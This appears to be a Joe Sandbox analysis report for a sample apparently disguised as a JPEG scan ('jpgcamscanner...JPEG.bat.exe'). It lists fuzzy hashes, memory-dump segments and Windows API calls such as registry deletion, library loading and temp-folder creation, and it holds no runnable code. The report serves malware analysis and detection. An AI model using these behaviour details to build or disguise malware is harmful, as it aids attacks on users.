                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
                                  • Instruction ID: ffc4466fd7e1a84d1c0fc4b16d1a76bfc4ed23806840a2aa82a83de6544419ef
                                  • Opcode Fuzzy Hash: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
                                  • Instruction Fuzzy Hash: D6A15371E00229DBDF28CFA8C8547ADBBB1FF44305F15802AD856BB281C7789A96DF44
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
                                  • Instruction ID: 3b3aa2dd6ba4133719dd3176c6350ec32f9f513342808bce88e7bfcf8f6a0710
                                  • Opcode Fuzzy Hash: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
                                  • Instruction Fuzzy Hash: F4913370E00229DBDF28CF98C8587ADBBB1FF44305F15802AD852BB291C7789A96DF44
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
                                  • Instruction ID: 583e61d198cc77022754fa770bf55cdcc509db116518bb017f27c6a68360c261
                                  • Opcode Fuzzy Hash: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
                                  • Instruction Fuzzy Hash: B9814471D04229DBDF24CFA8C884BADBBB1FF44305F25816AD446BB281C7389A96DF54
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
                                  • Instruction ID: 20cbf149701654aecfc40dff313aa48f1da8dd35a22a44c357500b5e58bb095b
                                  • Opcode Fuzzy Hash: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
                                  • Instruction Fuzzy Hash: 1B816571D04229DBDF28CFA8C844BADBBB0FF44305F21816AD856BB281C7785A96DF54
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
                                  • Instruction ID: 803a34037b0f7f5be0b8e0f61a876c36f0b5510bb0b2ab0f73e67388892f039f
                                  • Opcode Fuzzy Hash: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
                                  • Instruction Fuzzy Hash: 95710471D04229DBDF24CFA8C8447ADBBB1FB44305F15806AD846BB281D7385A96DF54
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
                                  • Instruction ID: ad71f402e4a9b92a37c553ea73d368b4d72ad24497358f0b079e3127edd250f9
                                  • Opcode Fuzzy Hash: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
                                  • Instruction Fuzzy Hash: 5D713571D04229DBDF28CF98C844BADBBB1FF44305F15806AD856BB281C7389A96DF54
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
                                  • Instruction ID: 5c7df32a9af3fd0bcd177ef93077855236352ac101eaea0ca8dc2b1de7da3dc3
                                  • Opcode Fuzzy Hash: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
                                  • Instruction Fuzzy Hash: B5715571D04229DBEF28CF98C844BADBBB1FF44305F15806AD842BB281C7389A96DF44
                                  APIs
                                  • EnumResourceTypesA.KERNEL32(00000000), ref: 6DDA2A7F
                                  • GetLastError.KERNEL32 ref: 6DDA2B86
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: EnumErrorLastResourceTypes
                                  • String ID:
                                  • API String ID: 1485949383-0
                                  • Opcode ID: eba51940d4332acd4dd47c7e74c05a894e05f103e3ed4f03ff63104eadf75363
                                  • Instruction ID: b25d85e1bbcd4d244f4eb148e0c9713a17237d487539c162f8862d6a8c19e52d
                                  • Opcode Fuzzy Hash: eba51940d4332acd4dd47c7e74c05a894e05f103e3ed4f03ff63104eadf75363
                                  • Instruction Fuzzy Hash: C1517F72988215EFEB34BF67D850B5D3FB4EB0A71CF2DE426F50886210DB38A4419B65
                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
                                  • Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
                                  • Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
                                  • Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                  APIs
                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CloseDeleteValue
                                  • String ID:
                                  • API String ID: 2831762973-0
                                  • Opcode ID: e52abd4e0174ce3b76bb68f1c379d5c93953ff2c69c58b640d2bcd16652b4586
                                  • Instruction ID: b5e441b27b73f145435eebc05e6f2b3deee3722b7b5d1586dbbfb91a11b86f75
                                  • Opcode Fuzzy Hash: e52abd4e0174ce3b76bb68f1c379d5c93953ff2c69c58b640d2bcd16652b4586
                                  • Instruction Fuzzy Hash: A5F09C72B00111ABD711AFE49A8EABE76A49B40314F25453FF602B71C1D6FC5E02876E
                                  APIs
                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$EnableShow
                                  • String ID:
                                  • API String ID: 1136574915-0
                                  • Opcode ID: fb89bb2f38fe5b8984a52f5cfda2f345f39b2a72ed458b6a7c2d67b6650651d2
                                  • Instruction ID: 03bd5150381a8100516e4bd6b800a38f5b51aa9a4917fb4b876f9ca09f65a04e
                                  • Opcode Fuzzy Hash: fb89bb2f38fe5b8984a52f5cfda2f345f39b2a72ed458b6a7c2d67b6650651d2
                                  • Instruction Fuzzy Hash: 7FE092B2F08202AFDB14EBE5E9485EEB7B0DF40319B10403BE001F11D0DA7849419F59
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040632F
                                    • Part of subcall function 00406294: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062AB
                                    • Part of subcall function 00406294: wsprintfA.USER32 ref: 004062E4
                                    • Part of subcall function 00406294: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: 0d35e83e7827ddfc44332ff894d31571b8ba04ccc8674abf719cedda659f01fc
                                  • Instruction ID: 7792f7d89acf823de2699a2c6bb45250695d03a410eb934ddee53f05324a8379
                                  • Opcode Fuzzy Hash: 0d35e83e7827ddfc44332ff894d31571b8ba04ccc8674abf719cedda659f01fc
                                  • Instruction Fuzzy Hash: D2E08C32A08221ABD3106B74AD0493B73E8DB99740702487EFA06F2180D738EC2296A9
                                  APIs
                                  • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00405B07
                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                  • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                  • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                  • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,00000000,004031C9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 004055DA
                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
